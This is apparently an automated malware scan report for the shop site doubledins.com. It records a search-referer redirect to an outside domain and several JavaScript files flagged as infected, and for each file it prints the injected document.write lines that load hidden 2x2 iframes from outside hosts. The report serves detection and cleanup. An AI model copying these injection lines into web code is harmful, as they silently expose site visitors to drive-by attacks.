Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://doubledins.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: doubledins.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 17:05:24 GMT Location: http://hecodat.de/zwmd.html?h=922333 Server: Apache Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://doubledins.com/ | 200 OK Content-Length: 75672 Content-Type: text/html | clean |
http://doubledins.com/js/jquery/jquery-1.4.4.min.js | 200 OK Content-Length: 78754 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333></iframe>');
(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}fu b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}})})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333> | ||
http://doubledins.com/js/jquery/jquery.easing.1.3.js | 200 OK Content-Length: 5109 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=922333></iframe>');
jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=922333> | ||
http://doubledins.com/js/tools.js | 200 OK Content-Length: 6714 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=922333></iframe>'); function ps_round(value, precision) { if (typeof(roundMode) == 'undefined') roundMode = 2; if (typeof(precision) == 'un url: baseDir + 'changecurrency.php', data: 'id_currency='+parseInt(id_currency), success: function(msg) { location.reload(true); } }); } function isArrowKey(k_ev) { var unicode=k_ev.keyCode? k_ev.keyCode : k_ev.charCode; if (unicode >= 37 && unicode <= 40) return true; } $().ready(function() { $('form').submit(function() { $(this).find('.hideOnSubmit').hide(); }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/womd.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=922333> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333> | ||
http://doubledins.com/modules/blockcart/ajax-cart.js | 200 OK Content-Length: 25137 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=922333></iframe>');
var ajaxCart = { overrideButtonsInThePage : function(){ $('.ajax_add_to_cart_button').unbind('click').click(function(){ var idProduct = $(this).attr('rel').replace('ajax_id_product_', ''); if ($(this).attr('disabled') != 'disabled') ajaxCart.add(idProduct, null, false, this); retu $(this).hide(); }); $('.ajax_cart_no_product').show('slow'); } } }; $(document).ready(function(){ $('#block_cart_collapse').click(function(){ ajaxCart.collapse(); }); $('#block_cart_expand').click(function(){ ajaxCart.expand(); }); ajaxCart.overrideButtonsInThePage(); ajaxCart.refresh(); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=922333> | ||
http://doubledins.com/themes/doubledins/js/tools/treeManagement.js | 200 OK Content-Length: 1995 Content-Type: application/javascript | clean |
http://doubledins.com/js/jquery/jquery.autocomplete.js | 200 OK Content-Length: 19939 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333></iframe>');
;(function($) { $.fn.extend({ autocomplete: function(urlOrData, options) { var isUrl = typeof urlOrData == "string"; options = $.extend({}, $.Autocompleter.defaults, { url: isUrl ? urlOrData : null, data: isUrl ? null : urlOrData, delay: isUrl ? $.Autocompleter.defaults.delay : if( field.createTextRange ){ var selRange = field.createTextRange(); selRange.collapse(true); selRange.moveStart("character", start); selRange.moveEnd("character", end); selRange.select(); } else if( field.setSelectionRange ){ field.setSelectionRange(start, end); } else { if( field.selectionStart ){ field.selectionStart = start; field.selectionEnd = end; } } field.focus(); }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333> | ||
http://doubledins.com/modules/lofcamera/js/slide.camera.js | 200 OK Content-Length: 39358 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://goldilockslc.com/mazf.html?j=922333></iframe>');
;(function(a){a.fn.camera=function(b,c){function bj(c){j.addClass("camerasliding");R=false;var d=parseFloat(a("div.cameraSlide.cameracurrent",k).index());if(c>0){var l=c-1}else if(d==B-1){var l=0}else{var l=d+1}var m=a(".cameraSlide:eq("+l+")",k);var n=a(".cameraSlide:eq("+(l+1)+")",k);a(".cameraContent",g).fadeOut( Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://goldilockslc.com/mazf.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://goldilockslc.com/mazf.html?j=922333> | ||
http://doubledins.com/js/jquery/jquery.validate.creditcard2-1.0.1.js | 200 OK Content-Length: 3960 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333></iframe>');
 function validateCC(cardNo, cardName) { var cards = new Array(); cards[0] = { cardName: "Visa", lengths: "13,16", prefixes: "4", checkdigit: true }; cards[1] = { cardName: "MasterCard", lengths: "16", prefixes: "51,52,53,54,55", checkdigit: true }; cards[2] = { cardName: "DinersClub", lengths: prefix = cards[cardType].prefixes.split(","); for (i = 0; i < prefix.length; i++) { var exp = new RegExp("^" + prefix[i]); if (exp.test(cardNo)) prefixValid = true; } if (!prefixValid) { return false; } lengths = cards[cardType].lengths.split(","); for (j = 0; j < lengths.length; j++) { if (cardNo.length == lengths[j]) lengthValid = true; } if (!lengthValid) { return false; } return true; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333> | ||
http://doubledins.com/themes/doubledins/js/menu/global_footer.js | 200 OK Content-Length: 4219 Content-Type: application/javascript | clean |
http://doubledins.com/themes/doubledins/js/slide/jquery.min.js | 200 OK Content-Length: 84893 Content-Type: application/javascript | clean |
http://doubledins.com/themes/doubledins/js/slide/slides.min.jquery.js | 200 OK Content-Length: 8574 Content-Type: application/javascript | clean |
http://doubledins.com//tracedseals.starfieldtech.com/siteseal/get?scriptId=cdSiteSeal1&cdSealType=Seal1&sealId=55e4ye7y7mb7301a20177cf52071d7dujpy7mb7355e4ye7d7ab18ce34dee30e9/ | 404 Not Found Content-Length: 2836 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.domus-vita.de/counter.php <iframe src="http://www.domus-vita.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://doubledins.com/test404page.js | 404 Not Found Content-Length: 2836 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.domus-vita.de/counter.php <iframe src="http://www.domus-vita.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=doubledins.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://doubledins.com/
Result: doubledins.com is not infected or malware details are not published yet.
Result: doubledins.com is not infected or malware details are not published yet.